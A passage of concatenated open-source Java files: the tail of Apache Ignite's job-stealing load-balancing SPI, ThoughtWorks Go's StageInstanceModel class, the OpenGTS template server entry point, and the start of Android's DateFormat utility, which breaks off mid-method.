extLsnr; // Let grid know that collisions should be resolved. if (tmp != null) tmp.onExternalCollision(); } }, JOB_STEALING_COMM_TOPIC); } /** {@inheritDoc} */ @Override public void onContextDestroyed0() { if (discoLsnr != null) getSpiContext().removeLocalEventListener(discoLsnr); if (msgLsnr != null) getSpiContext().removeMessageListener(msgLsnr, JOB_STEALING_COMM_TOPIC); } /** {@inheritDoc} */ @Override public void onCollision(CollisionContext ctx) { assert ctx != null; Collection<CollisionJobContext> activeJobs = ctx.activeJobs(); Collection<CollisionJobContext> waitJobs = ctx.waitingJobs(); heldNum = ctx.heldJobs().size(); // Check if there are any jobs to activate or reject. int rejected = checkBusy(waitJobs, activeJobs); totalStolenJobsNum.addAndGet(rejected); // No point of stealing jobs if some jobs were rejected. if (rejected > 0) { if (log.isDebugEnabled()) log.debug("Total count of rejected jobs: " + rejected); return; } if (isStealingEnabled) // Check if there are jobs to steal. checkIdle(waitJobs, activeJobs); } /** * Check if node is busy and activate/reject proper number of jobs. * * @param waitJobs Waiting jobs. * @param activeJobs Active jobs. * @return Number of rejected jobs. */ private int checkBusy(Collection<CollisionJobContext> waitJobs, Collection<CollisionJobContext> activeJobs) { int activeSize = activeJobs.size(); int waitSize = waitJobs.size(); waitingNum = waitJobs.size(); runningNum = activeSize; IgniteSpiContext ctx = getSpiContext(); int activated = 0; int rejected = 0; Collection<CollisionJobContext> waitPriJobs = sortJobs(waitJobs, waitSize); int activeJobsThreshold0 = activeJobsThreshold; int waitJobsThreshold0 = waitJobsThreshold; for (CollisionJobContext waitCtx : waitPriJobs) { if (activeJobs.size() < activeJobsThreshold0) { activated++; // If job was activated/cancelled by another thread, then // this method is no-op. // We also need to make sure that job is not being rejected by another thread. synchronized (waitCtx.getJobContext()) { waitCtx.activate(); } } else if (stealReqs.get() > 0) { if (waitCtx.getJob().getClass().isAnnotationPresent(JobStealingDisabled.class)) continue; // Collision count attribute. Integer stealingCnt = waitCtx.getJobContext().getAttribute(STEALING_ATTEMPT_COUNT_ATTR); // Check that maximum stealing attempt threshold // has not been exceeded. if (stealingCnt != null) { // If job exceeded failover threshold, skip it. if (stealingCnt >= maxStealingAttempts) { if (log.isDebugEnabled()) log.debug("Waiting job exceeded stealing attempts and won't be rejected " + "(will try other jobs on waiting list): " + waitCtx); continue; } } else stealingCnt = 0; // Check if allowed to reject job. int jobsToReject = waitPriJobs.size() - activated - rejected - waitJobsThreshold0; if (log.isDebugEnabled()) log.debug("Jobs to reject count [jobsToReject=" + jobsToReject + ", waitCtx=" + waitCtx + ']'); if (jobsToReject <= 0) break; Integer pri = waitCtx.getJobContext().getAttribute(STEALING_PRIORITY_ATTR); if (pri == null) pri = DFLT_JOB_PRIORITY; // If we have an excess of waiting jobs, reject as many as there are // requested to be stolen. Note, that we use lose total steal request // counter to prevent excessive iteration over nodes under load. for (Iterator<Entry<UUID, MessageInfo>> iter = rcvMsgMap.entrySet().iterator(); iter.hasNext() && stealReqs.get() > 0;) { Entry<UUID, MessageInfo> entry = iter.next(); UUID nodeId = entry.getKey(); // Node has left topology. if (ctx.node(nodeId) == null) { iter.remove(); continue; } MessageInfo info = entry.getValue(); synchronized (info) { int jobsAsked = info.jobsToSteal(); assert jobsAsked >= 0; // Skip nodes that have not asked for jobs to steal. if (jobsAsked == 0) // Move to next node. continue; // If message is expired, ignore it. if (info.expired()) { // Subtract expired messages. stealReqs.addAndGet(-info.jobsToSteal()); info.reset(0); continue; } // Check that waiting job has thief node in topology. boolean found = false; for (UUID id : waitCtx.getTaskSession().getTopology()) { if (id.equals(nodeId)) { found = true; break; } } if (!found) { if (log.isDebugEnabled()) log.debug("Thief node does not belong to task topology [thief=" + nodeId + ", task=" + waitCtx.getTaskSession() + ']'); continue; } if (stealReqs.get() <= 0) break; // Need to make sure that job is not being // rejected by another thread. synchronized (waitCtx.getJobContext()) { boolean cancel = waitCtx.getJobContext().getAttribute(THIEF_NODE_ATTR) == null; if (cancel) { // Mark job as stolen. waitCtx.getJobContext().setAttribute(THIEF_NODE_ATTR, nodeId); waitCtx.getJobContext().setAttribute(STEALING_ATTEMPT_COUNT_ATTR, stealingCnt + 1); waitCtx.getJobContext().setAttribute(STEALING_PRIORITY_ATTR, pri + 1); if (log.isDebugEnabled()) log.debug("Will try to reject job due to steal request [ctx=" + waitCtx + ", thief=" + nodeId + ']'); int i = stealReqs.decrementAndGet(); if (i >= 0 && waitCtx.cancel()) { rejected++; info.reset(jobsAsked - 1); if (log.isDebugEnabled()) log.debug("Rejected job due to steal request [ctx=" + waitCtx + ", nodeId=" + nodeId + ']'); } else { if (log.isDebugEnabled()) log.debug("Failed to reject job [i=" + i + ']'); waitCtx.getJobContext().setAttribute(THIEF_NODE_ATTR, null); waitCtx.getJobContext().setAttribute(STEALING_ATTEMPT_COUNT_ATTR, stealingCnt); waitCtx.getJobContext().setAttribute(STEALING_PRIORITY_ATTR, pri); stealReqs.incrementAndGet(); } } } // Move to next job. break; } } } else // No more jobs to steal or activate. break; } return rejected; } /** * Sort jobs by priority from high to lowest value. * * @param waitJobs Waiting jobs. * @param waitSize Snapshot size. * @return Sorted waiting jobs by priority. */ private Collection<CollisionJobContext> sortJobs(Collection<CollisionJobContext> waitJobs, int waitSize) { List<CollisionJobContext> passiveList = new ArrayList<>(waitJobs.size()); int i = 0; for (CollisionJobContext waitJob : waitJobs) { passiveList.add(waitJob); if (i++ == waitSize) break; } Collections.sort(passiveList, comparator()); return passiveList; } /** * @return Comparator. */ private Comparator<CollisionJobContext> comparator() { if (cmp == null) { cmp = new Comparator<CollisionJobContext>() { @Override public int compare(CollisionJobContext o1, CollisionJobContext o2) { int p1 = getJobPriority(o1.getJobContext()); int p2 = getJobPriority(o2.getJobContext()); return p1 < p2 ? 1 : p1 == p2 ? 0 : -1; } }; } return cmp; } /** * Gets job priority from task context. If job has no priority default one will be used. * * @param ctx Job context. * @return Job priority. */ private int getJobPriority(ComputeJobContext ctx) { assert ctx != null; Integer p; try { p = ctx.getAttribute(STEALING_PRIORITY_ATTR); } catch (ClassCastException e) { U.error(log, "Type of job context priority attribute '" + STEALING_PRIORITY_ATTR + "' is not java.lang.Integer (will use default priority) [type=" + ctx.getAttribute(STEALING_PRIORITY_ATTR).getClass() + ", dfltPriority=" + DFLT_JOB_PRIORITY + ']', e); p = DFLT_JOB_PRIORITY; } if (p == null) p = DFLT_JOB_PRIORITY; return p; } /** * Check if the node is idle and steal as many jobs from other nodes * as possible. * * @param waitJobs Waiting jobs. * @param activeJobs Active jobs. */ private void checkIdle(Collection<CollisionJobContext> waitJobs, Collection<CollisionJobContext> activeJobs) { // Check for overflow. int max = waitJobsThreshold + activeJobsThreshold; if (max < 0) max = Integer.MAX_VALUE; int jobsToSteal = max - (waitJobs.size() + activeJobs.size()); if (log.isDebugEnabled()) log.debug("Total number of jobs to be stolen: " + jobsToSteal); if (jobsToSteal > 0) { int jobsLeft = jobsToSteal; ClusterNode next; int nodeCnt = getSpiContext().remoteNodes().size(); int idx = 0; while (jobsLeft > 0 && idx++ < nodeCnt && (next = nodeQueue.poll()) != null) { if (getSpiContext().node(next.id()) == null) continue; // Remote node does not have attributes - do not steal from it. if (!F.isEmpty(stealAttrs) && (next.attributes() == null || !U.containsAll(next.attributes(), stealAttrs))) { if (log.isDebugEnabled()) log.debug("Skip node as it does not have all attributes: " + next.id()); continue; } int delta = 0; try { MessageInfo msgInfo = sndMsgMap.get(next.id()); if (msgInfo == null) { if (log.isDebugEnabled()) log.debug("Failed to find message info for node: " + next.id()); // Node left topology or SPI has not received message for it. continue; } Integer waitThreshold = next.attribute(createSpiAttributeName(WAIT_JOBS_THRESHOLD_NODE_ATTR)); if (waitThreshold == null) { U.error(log, "Remote node is not configured with GridJobStealingCollisionSpi and " + "jobs will not be stolen from it (you must stop it and update its configuration to use " + "GridJobStealingCollisionSpi): " + next); continue; } delta = next.metrics().getCurrentWaitingJobs() - waitThreshold; if (log.isDebugEnabled()) log.debug("Maximum number of jobs to steal from node [jobsToSteal=" + delta + ", node=" + next.id() + ']'); // Nothing to steal from this node. if (delta <= 0) continue; synchronized (msgInfo) { if (!msgInfo.expired() && msgInfo.jobsToSteal() > 0) { // Count messages being waited for as present. jobsLeft -= msgInfo.jobsToSteal(); continue; } if (jobsLeft < delta) delta = jobsLeft; jobsLeft -= delta; msgInfo.reset(delta); } // Send request to remote node to steal jobs. // Message is a plain integer represented by 'delta'. getSpiContext().send(next, new JobStealingRequest(delta), JOB_STEALING_COMM_TOPIC); } catch (IgniteSpiException e) { U.error(log, "Failed to send job stealing message to node: " + next, e); // Rollback. jobsLeft += delta; } finally { // If node is alive, add back to the end of the queue. if (getSpiContext().node(next.id()) != null) nodeQueue.offer(next); } } } } /** {@inheritDoc} */ @Override protected List<String> getConsistentAttributeNames() { List<String> attrs = new ArrayList<>(2); attrs.add(createSpiAttributeName(MAX_STEALING_ATTEMPT_ATTR)); attrs.add(createSpiAttributeName(MSG_EXPIRE_TIME_ATTR)); return attrs; } /** {@inheritDoc} */ @Override public String toString() { return S.toString(JobStealingCollisionSpi.class, this); } /** * */ private class MessageInfo { /** */ private int jobsToSteal; /** */ private long ts = U.currentTimeMillis(); /** * @return Job to steal. */ int jobsToSteal() { assert Thread.holdsLock(this); return jobsToSteal; } /** * @return {@code True} if message is expired. */ boolean expired() { assert Thread.holdsLock(this); return jobsToSteal > 0 && U.currentTimeMillis() - ts >= msgExpireTime; } /** * @param jobsToSteal Jobs to steal. */ void reset(int jobsToSteal) { assert Thread.holdsLock(this); this.jobsToSteal = jobsToSteal; ts = U.currentTimeMillis(); } /** {@inheritDoc} */ @Override public String toString() { return S.toString(MessageInfo.class, this); } } }
/*************************GO-LICENSE-START********************************* * Copyright 2014 ThoughtWorks, Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. *************************GO-LICENSE-END***********************************/ package com.thoughtworks.go.presentation.pipelinehistory; import com.thoughtworks.go.domain.StageIdentifier; import com.thoughtworks.go.domain.StageResult; import com.thoughtworks.go.domain.StageState; import com.thoughtworks.go.server.presentation.models.StageConfigurationModel; import java.util.Date; import static com.thoughtworks.go.util.GoConstants.APPROVAL_SUCCESS; public class StageInstanceModel implements StageConfigurationModel { private String name; private long id; private JobHistory jobHistory; private boolean canRun; private boolean scheduled = true; // true if this stage history really happened private String approvalType; private String approvedBy; private String counter; private boolean operatePermission; private StageInstanceModel previousStage; private StageResult result; private StageIdentifier identifier; private Integer rerunOfCounter; public boolean hasOperatePermission() { return operatePermission; } public void setOperatePermission(boolean operatePermission) { this.operatePermission = operatePermission; } public boolean isSelected() { return selected; } private boolean selected; // for test public StageInstanceModel(String name, String counter, JobHistory jobHistory) { this.name = name; this.jobHistory = jobHistory; this.counter = counter; } // for test public StageInstanceModel(String name, String counter, JobHistory jobHistory, StageIdentifier identifier) { this(name, counter, jobHistory); this.identifier = identifier; } public StageInstanceModel(String name, String counter, StageResult result, StageIdentifier identifier) { this(name, counter, new JobHistory(), identifier); this.result = result; } // for ibatis public StageInstanceModel() { } public String getName() { return name; } public void setName(String name) { this.name = name; } public long getId() { return id; } public void setId(long id) { this.id = id; } public JobHistory getBuildHistory() { return jobHistory; } public void setBuildHistory(JobHistory jobHistory) { this.jobHistory = jobHistory; } public StageState getState() { return StageState.findByBuilds(jobHistory); } public String getApprovedBy() { return approvedBy; } public void setApprovedBy(String approvedBy) { this.approvedBy = approvedBy; } public String getApprovalDescription() { if (approvedBy == null) { return "Awaiting Approval"; } return "Approved by " + approvedBy; } public String getApprovalType() { return approvalType; } public String getApprovalTypeDescription() { if (isAutoApproved()) { return "auto"; } else { return "manual"; } } public boolean needsApproval() { return approvedBy == null && getState().completed(); } public boolean isAutoApproved() { return APPROVAL_SUCCESS.equals(approvalType); } public Date getScheduledDate() { return jobHistory.getScheduledDate(); } public boolean getCanRun() { return this.canRun; } public boolean getCanReRun() { return canRun; } public boolean getCanCancel() { return operatePermission && getState().isActive(); } public void setCanRun(boolean canRun) { this.canRun = canRun; } public boolean isScheduled() { return scheduled; } public void setScheduled(boolean value) { this.scheduled = value; } public boolean equals(Object o) { if (this == o) { return true; } if (o == null || getClass() != o.getClass()) { return false; } StageInstanceModel that = (StageInstanceModel) o; if (!name.equals(that.name)) { return false; } return true; } public int hashCode() { return name.hashCode(); } public void setApprovalType(String approvalType) { this.approvalType = approvalType; } public String getCounter() { return counter; } public void setCounter(String counter) { this.counter = counter; } public void setSelected(boolean selected) { this.selected = selected; } public boolean getCanApprove() { return (getCanRun() && !isScheduled()); } public boolean hasUnsuccessfullyCompleted() { for (JobHistoryItem jobHistoryItem : jobHistory) { if(jobHistoryItem.hasUnsuccessfullyCompleted()) return true; } return false; } public boolean hasPassed() { for (JobHistoryItem jobHistoryItem : jobHistory) { if(!jobHistoryItem.hasPassed()) return false; } return true; } public boolean isRunning() { for (JobHistoryItem jobHistoryItem : jobHistory) { if(jobHistoryItem.isRunning()) return true; } return false; } public boolean hasPreviousStage() { return this.previousStage != null; } public void setPreviousStage(StageInstanceModel previousStage) { this.previousStage = previousStage; } public StageInstanceModel getPreviousStage() { return previousStage; } public StageResult getResult() { return result; } public StageIdentifier getIdentifier() { return identifier; } public String getPipelineName() { return identifier.getPipelineName(); } public Integer getPipelineCounter() { return identifier.getPipelineCounter(); } public String locator() { return identifier.getStageLocator(); } public boolean isRerunJobs() { return rerunOfCounter != null; } public Integer getRerunOfCounter() { return rerunOfCounter; } public void setRerunOfCounter(Integer rerunOfCounter) { this.rerunOfCounter = rerunOfCounter; } }
// ---------------------------------------------------------------------------- // Copyright 2007-2013, GeoTelematic Solutions, Inc. // All rights reserved // ---------------------------------------------------------------------------- // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. // // ---------------------------------------------------------------------------- // Description: // Main Entry point for a Template example server // ---------------------------------------------------------------------------- // Change History: // 2006/06/30 Martin D. Flynn // -Initial release // 2006/07/27 Martin D. Flynn // -Moved constant information to 'Constants.java' // 2009/08/07 Martin D. Flynn // -Updated to use DCServerConfig // ---------------------------------------------------------------------------- package org.opengts.servers.template; import java.lang.*; import java.util.*; import java.io.*; import org.opengts.util.*; import org.opengts.dbtools.*; import org.opengts.dbtypes.*; import org.opengts.db.*; import org.opengts.db.tables.*; /** *** <code>Main</code> - The main entry point for this device communication server (DCS) *** module. **/ public class Main { // ------------------------------------------------------------------------ /* command-line argument keys */ //public static final String ARG_DEVCODE[] = new String[] { "devcode", "dcs" , "serverid" }; public static final String ARG_PARSEFILE[] = new String[] { "parse" , "parseFile" }; public static final String ARG_HELP[] = new String[] { "help" , "h" }; //public static final String ARG_TCP_PORT[] = new String[] { "tcp" , "p" , "port" }; //public static final String ARG_UDP_PORT[] = new String[] { "udp" , "p" , "port" }; public static final String ARG_CMD_PORT[] = new String[] { "command", "cmd" }; public static final String ARG_START[] = new String[] { "start" }; public static final String ARG_DEBUG[] = new String[] { "debug" }; public static final String ARG_FORMAT[] = new String[] { "format" , "parseFormat" }; public static final String ARG_INSERT[] = new String[] { "insert" }; // ------------------------------------------------------------------------ // ------------------------------------------------------------------------ public static String DCServerFactory_LoadName() { return Main.getServerContextName(); } /* return server config */ public static String getServerName() { return Constants.DEVICE_CODE; } public static String getServerContextName() { return RTConfig.getContextName(Main.getServerName()); } /* return server config */ private static DCServerConfig dcServerCfg = null; public static DCServerConfig getServerConfig(Device dev) { if (dcServerCfg == null) { dcServerCfg = DCServerFactory.getServerConfig(Main.getServerContextName()); DCServerConfig.startRemoteLogging(dcServerCfg); } return dcServerCfg; } // ------------------------------------------------------------------------ /* get server TCP ports (first check command-line, then config file) */ public static int[] getTcpPorts() { DCServerConfig dcs = Main.getServerConfig(null); if (dcs != null) { return dcs.getTcpPorts(); } else { Print.logError("DCServerConfig not found for server: " + getServerName()); return null; } } /* get server UDP ports (first check command-line, then config file) */ public static int[] getUdpPorts() { DCServerConfig dcs = Main.getServerConfig(null); if (dcs != null) { return dcs.getUdpPorts(); } else { Print.logError("DCServerConfig not found for server: " + getServerName()); return null; } } /* get server ports (first check command-line, then config file, then default) */ public static int getCommandDispatcherPort() { DCServerConfig dcs = Main.getServerConfig(null); if (dcs != null) { return dcs.getCommandDispatcherPort(); } else { return RTConfig.getInt(ARG_CMD_PORT,0); } } // ------------------------------------------------------------------------ // ------------------------------------------------------------------------ // Main entry point /* display usage and exit */ private static void usage(String msg) { String tcp = StringTools.join(getTcpPorts(),","); String udp = StringTools.join(getUdpPorts(),","); String cmd = String.valueOf(getCommandDispatcherPort()); /* print message */ if (msg != null) { Print.logInfo(msg); } /* print usage */ String className = Main.class.getName(); Print.logInfo(""); Print.logInfo("Usage:"); Print.logInfo(" java ... " + className + " -h[elp]"); Print.logInfo(" or"); Print.logInfo(" java ... " + className + " -parseFile=<filePath>"); Print.logInfo(" or"); Print.logInfo(" java ... " + className + " [-port=<port>[,<port>]] -start"); Print.logInfo("Options:"); Print.logInfo(" -help This help"); Print.logInfo(" [-port=<p>[,<p>]] Server TCP/UDP port(s) to listen"); Print.logInfo(" [-tcp=<p>[,<p>]] Server TCP port(s) to listen on [dft="+tcp+"]"); Print.logInfo(" [-udp=<p>[,<p>]] Server UDP port(s) to listen on [dft="+udp+"]"); Print.logInfo(" [-command=<p>] Command port to listen on [dft="+cmd+"]"); Print.logInfo(" [-dcs=<serverId>] DCServer ID [dft="+Constants.DEVICE_CODE+"]"); Print.logInfo(" [-format=<parser#>] Parser Format #"); Print.logInfo(" -start Start server on the specified port."); Print.logInfo(" -parseFile=<file> File from which data will be parsed."); Print.logInfo(""); /* exit */ System.exit(1); } /* main entry point */ public static void main(String argv[]) { /* configure server for MySQL data store */ DBConfig.cmdLineInit(argv,false); // main /* device code */ /* obsolete DEVICE_CODE = RTConfig.getString(ARG_DEVCODE, Constants.DEVICE_CODE); if (StringTools.isBlank(DEVICE_CODE)) { Print.logFatal("Invalid device-code specified"); Main.usage(""); System.exit(1); } */ /* init configuration constants */ TrackClientPacketHandler.configInit(); TrackServer.configInit(); DCServerConfig dcsc = Main.getServerConfig(null); String uniquPfx = (dcsc != null)? StringTools.join(dcsc.getUniquePrefix(),",") : "n/a"; /* header */ String SEP = "--------------------------------------------------------------------------"; Print.logInfo(SEP); Print.logInfo(Constants.TITLE_NAME + " Server Version " + Constants.VERSION); Print.logInfo("DeviceCode : " + Constants.DEVICE_CODE); Print.logInfo("UniqueID Prefix : " + uniquPfx); Print.logInfo("ParseFormat : " + TrackClientPacketHandler.DATA_FORMAT_OPTION); Print.logInfo("MinimumSpeed : " + TrackClientPacketHandler.MINIMUM_SPEED_KPH); Print.logInfo("EstimateOdom : " + TrackClientPacketHandler.ESTIMATE_ODOMETER); Print.logInfo("TCP Idle Timeout : " + TrackServer.getTcpIdleTimeout() + " ms"); Print.logInfo("TCP Packet Timeout : " + TrackServer.getTcpPacketTimeout() + " ms"); Print.logInfo("TCP Session Timeout : " + TrackServer.getTcpSessionTimeout() + " ms"); Print.logInfo("UDP Idle Timeout : " + TrackServer.getUdpIdleTimeout() + " ms"); Print.logInfo("UDP Packet Timeout : " + TrackServer.getUdpPacketTimeout() + " ms"); Print.logInfo("UDP Session Timeout : " + TrackServer.getUdpSessionTimeout() + " ms"); Print.logInfo(Constants.COPYRIGHT); Print.logInfo(SEP); /* explicit help? */ if (RTConfig.getBoolean(ARG_HELP,false)) { Main.usage("Help ..."); // control doesn't reach here System.exit(0); } /* make sure the DB is properly initialized */ if (!DBAdmin.verifyTablesExist()) { Print.logFatal("MySQL database has not yet been properly initialized"); System.exit(1); } /* 'parseFile'? */ if (RTConfig.hasProperty(ARG_PARSEFILE)) { Print.sysPrintln("Attempting to parse data from file: " + RTConfig.getString(ARG_PARSEFILE)); RTConfig.setString("parseFile", RTConfig.getString(ARG_PARSEFILE)); int exit = TrackClientPacketHandler._main(true); System.exit(exit); } /* start server */ if (RTConfig.getBoolean(ARG_START,false)) { /* start port listeners */ try { int tcpPorts[] = getTcpPorts(); int udpPorts[] = getUdpPorts(); int commandPort = getCommandDispatcherPort(); TrackServer.startTrackServer(tcpPorts, udpPorts, commandPort); } catch (Throwable t) { // trap any server exception Print.logError("Error: " + t); } /* wait here forever while the server is running in a thread */ while (true) { try { Thread.sleep(60L * 60L * 1000L); } catch (Throwable t) {} } // control never reaches here } /* display usage */ Main.usage("Missing '-start' ..."); // control doesn't reach here System.exit(1); } }
/* * Copyright (C) 2006 The Android Open Source Project * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package android.text.format; import android.content.Context; import android.provider.Settings; import android.text.SpannableStringBuilder; import android.text.Spanned; import android.text.SpannedString; import com.android.internal.R; import java.util.Calendar; import java.util.Date; import java.util.GregorianCalendar; import java.util.Locale; import java.util.TimeZone; import java.text.SimpleDateFormat; import libcore.icu.ICU; import libcore.icu.LocaleData; /** * Utility class for producing strings with formatted date/time. * * <p>Most callers should avoid supplying their own format strings to this * class' {@code format} methods and rely on the correctly localized ones * supplied by the system. This class' factory methods return * appropriately-localized {@link java.text.DateFormat} instances, suitable * for both formatting and parsing dates. For the canonical documentation * of format strings, see {@link java.text.SimpleDateFormat}. * * <p>In cases where the system does not provide a suitable pattern, * this class offers the {@link #getBestDateTimePattern} method. * * <p>The {@code format} methods in this class implement a subset of Unicode * <a href="http://www.unicode.org/reports/tr35/#Date_Format_Patterns">UTS #35</a> patterns. * The subset currently supported by this class includes the following format characters: * {@code acdEHhLKkLMmsyz}. Up to API level 17, only {@code adEhkMmszy} were supported. * Note that this class incorrectly implements {@code k} as if it were {@code H} for backwards * compatibility. * * <p>See {@link java.text.SimpleDateFormat} for more documentation * about patterns, or if you need a more complete or correct implementation. * Note that the non-{@code format} methods in this class are implemented by * {@code SimpleDateFormat}. */ public class DateFormat { /** @deprecated Use a literal {@code '} instead. */ @Deprecated public static final char QUOTE = '\''; /** @deprecated Use a literal {@code 'a'} instead. */ @Deprecated public static final char AM_PM = 'a'; /** @deprecated Use a literal {@code 'a'} instead; 'A' was always equivalent to 'a'. */ @Deprecated public static final char CAPITAL_AM_PM = 'A'; /** @deprecated Use a literal {@code 'd'} instead. */ @Deprecated public static final char DATE = 'd'; /** @deprecated Use a literal {@code 'E'} instead. */ @Deprecated public static final char DAY = 'E'; /** @deprecated Use a literal {@code 'h'} instead. */ @Deprecated public static final char HOUR = 'h'; /** * @deprecated Use a literal {@code 'H'} (for compatibility with {@link SimpleDateFormat} * and Unicode) or {@code 'k'} (for compatibility with Android releases up to and including * Jelly Bean MR-1) instead. Note that the two are incompatible. */ @Deprecated public static final char HOUR_OF_DAY = 'k'; /** @deprecated Use a literal {@code 'm'} instead. */ @Deprecated public static final char MINUTE = 'm'; /** @deprecated Use a literal {@code 'M'} instead. */ @Deprecated public static final char MONTH = 'M'; /** @deprecated Use a literal {@code 'L'} instead. */ @Deprecated public static final char STANDALONE_MONTH = 'L'; /** @deprecated Use a literal {@code 's'} instead. */ @Deprecated public static final char SECONDS = 's'; /** @deprecated Use a literal {@code 'z'} instead. */ @Deprecated public static final char TIME_ZONE = 'z'; /** @deprecated Use a literal {@code 'y'} instead. */ @Deprecated public static final char YEAR = 'y'; private static final Object sLocaleLock = new Object(); private static Locale sIs24HourLocale; private static boolean sIs24Hour; /** * Returns true if user preference is set to 24-hour format. * @param context the context to use for the content resolver * @return true if 24 hour time format is selected, false otherwise. */ public static boolean is24HourFormat(Context context) { String value = Settings.System.getString(context.getContentResolver(), Settings.System.TIME_12_24); if (value == null) { Locale locale = context.getResources().getConfiguration().locale; synchronized (sLocaleLock) { if (sIs24HourLocale != null && sIs24HourLocale.equals(locale)) { return sIs24Hour; } } java.text.DateFormat natural = java.text.DateFormat.getTimeInstance(java.text.DateFormat.LONG, locale); if (natural instanceof SimpleDateFormat) { SimpleDateFormat sdf = (SimpleDateFormat) natural; String pattern = sdf.toPattern(); if (pattern.indexOf('H') >= 0) { value = "24"; } else { value = "12"; } } else { value = "12"; } synchronized (sLocaleLock) { sIs24HourLocale = locale; sIs24Hour = value.equals("24"); } return sIs24Hour; } return value.equals("24"); } /** * Returns the best possible localized form of the given skeleton for the given * locale. A skeleton is similar to, and uses the same format characters as, a Unicode * <a href="http://www.unicode.org/reports/tr35/#Date_Format_Patterns">UTS #35</a> * pattern. * * <p>One difference is that order is irrelevant. For example, "MMMMd" will return * "MMMM d" in the {@code en_US} locale, but "d. MMMM" in the {@code de_CH} locale. * * <p>Note also in that second example that the necessary punctuation for German was * added. For the same input in {@code es_ES}, we'd have even more extra text: * "d 'de' MMMM". * * <p>This method will automatically correct for grammatical necessity. Given the * same "MMMMd" input, this method will return "d LLLL" in the {@code fa_IR} locale, * where stand-alone months are necessary. Lengths are preserved where meaningful, * so "Md" would give a different result to "MMMd", say, except in a locale such as * {@code ja_JP} where there is only one length of month. * * <p>This method will only return patterns that are in CLDR, and is useful whenever * you know what elements you want in your format string but don't want to make your * code specific to any one locale. * * @param locale the locale into which the skeleton should be localized * @param skeleton a skeleton as described above * @return a string pattern suitable for use with {@link java.text.SimpleDateFormat}. */ public static String getBestDateTimePattern(Locale locale, String skeleton) { return ICU.getBestDateTimePattern(skeleton, locale.toString()); } /** * Returns a {@link java.text.DateFormat} object that can format the time according * to the current locale and the user's 12-/24-hour clock preference. * @param context the application context * @return the {@link java.text.DateFormat} object that properly formats the time. */ public static java.text.DateFormat getTimeFormat(Context context) { return new java.text.SimpleDateFormat(getTimeFormatString(context)); } /** * Returns a String pattern that can be used to format the time according * to the current locale and the user's 12-/24-hour clock preference. * @param context the application context * @hide */ public static String getTimeFormatString(Context context) { LocaleData d = LocaleData.get(context.getResources().getConfiguration().locale); return is24HourFormat(context) ? d.timeFormat24 : d.timeFormat12; } /** * Returns a {@link java.text.DateFormat} object that can format the date * in short form (such as 12/31/1999) according * to the current locale and the user's date-order preference. * @param context the application context * @return the {@link java.text.DateFormat} object that properly formats the date. */ public static java.text.DateFormat getDateFormat(Context context) { String value = Settings.System.getString(context.getContentResolver(), Settings.System.DATE_FORMAT); return getDateFormatForSetting(context, value); } /** * Returns a {@link java.text.DateFormat} object to format the date * as if the date format setting were set to <code>value</code>, * including null to use the locale's default format. * @param context the application context * @param value the date format setting string to interpret for * the current locale * @hide */ public static java.text.DateFormat getDateFormatForSetting(Context context, String value) { String format = getDateFormatStringForSetting(context, value); return new java.text.SimpleDateFormat(format); } private static String getDateFormatStringForSetting(Context context, String value) { if (value != null) { int month = value.indexOf('M'); int day = value.indexOf('d'); int year = value.indexOf('y'); if (month >= 0 && day >= 0 && year >= 0) { String template = context.getString(R.string.numeric_date_template); if (year < month && year < day) { if (month < day) { value = String.format(template, "yyyy", "MM", "dd"); } else { value = String.format(template, "yyyy", "dd", "MM"); } } else if (month < day) { if (day < year) { value = String.format(template, "MM", "dd", "yyyy"); } else { // unlikely value = String.format(template, "MM", "yyyy", "dd"); } } else { // day < month if (month < year) { value = String.format(template, "dd", "MM", "yyyy"); } else { // unlikely value = String.format(template, "dd", "yyyy", "MM"); } } return value; } } // The setting is not set; use the locale's default. LocaleData d = LocaleData.get(context.getResources().getConfiguration().locale); return d.shortDateFormat4; } /** * Returns a {@link java.text.DateFormat} object that can format the date * in long form (such as {@code Monday, January 3, 2000}) for the current locale. * @param context the application context * @return the {@link java.text.DateFormat} object that formats the date in long form. */ public static java.text.DateFormat getLongDateFormat(Context context) { return java.text.DateFormat.getDateInstance(java.text.DateFormat.LONG); } /** * Returns a {@link java.text.DateFormat} object that can format the date * in medium form (such as {@code Jan 3, 2000}) for the current locale. * @param context the application context * @return the {@link java.text.DateFormat} object that formats the date in long form. */ public static java.text.DateFormat getMediumDateFormat(Context context) { return java.text.DateFormat.getDateInstance(java.text.DateFormat.MEDIUM); } /** * Gets the current date format stored as a char array. The array will contain * 3 elements ({@link #DATE}, {@link #MONTH}, and {@link #YEAR}) in the order * specified by the user's format preference. Note that this order is * <i>only</i> appropriate for all-numeric dates; spelled-out (MEDIUM and LONG) * dates will generally contain other punctuation, spaces, or words, * not just the day, month, and year, and not necessarily in the same * order returned here. */ public static char[] getDateFormatOrder(Context context) { return ICU.getDateFormatOrder(getDateFormatString(context)); } private static String getDateFormatString(Context context) { String value = Settings.System.getString(context.getContentResolver(), Settings.System.DATE_FORMAT); return getDateFormatStringForSetting(context, value); } /** * Given a format string and a time in milliseconds since Jan 1, 1970 GMT, returns a * CharSequence containing the requested date. * @param inFormat the format string, as described in {@link android.text.format.DateFormat} * @param inTimeInMillis in milliseconds since Jan 1, 1970 GMT * @return a {@link CharSequence} containing the requested text */ public static CharSequence format(CharSequence inFormat, long inTimeInMillis) { return format(inFormat, new Date(inTimeInMillis)); } /** * Given a format string and a {@link java.util.Date} object, returns a CharSequence containing * the requested date. * @param inFormat the format string, as described in {@link android.text.format.DateFormat} * @param inDate the date to format * @return a {@link CharSequence} containing the requested text */ public static CharSequence 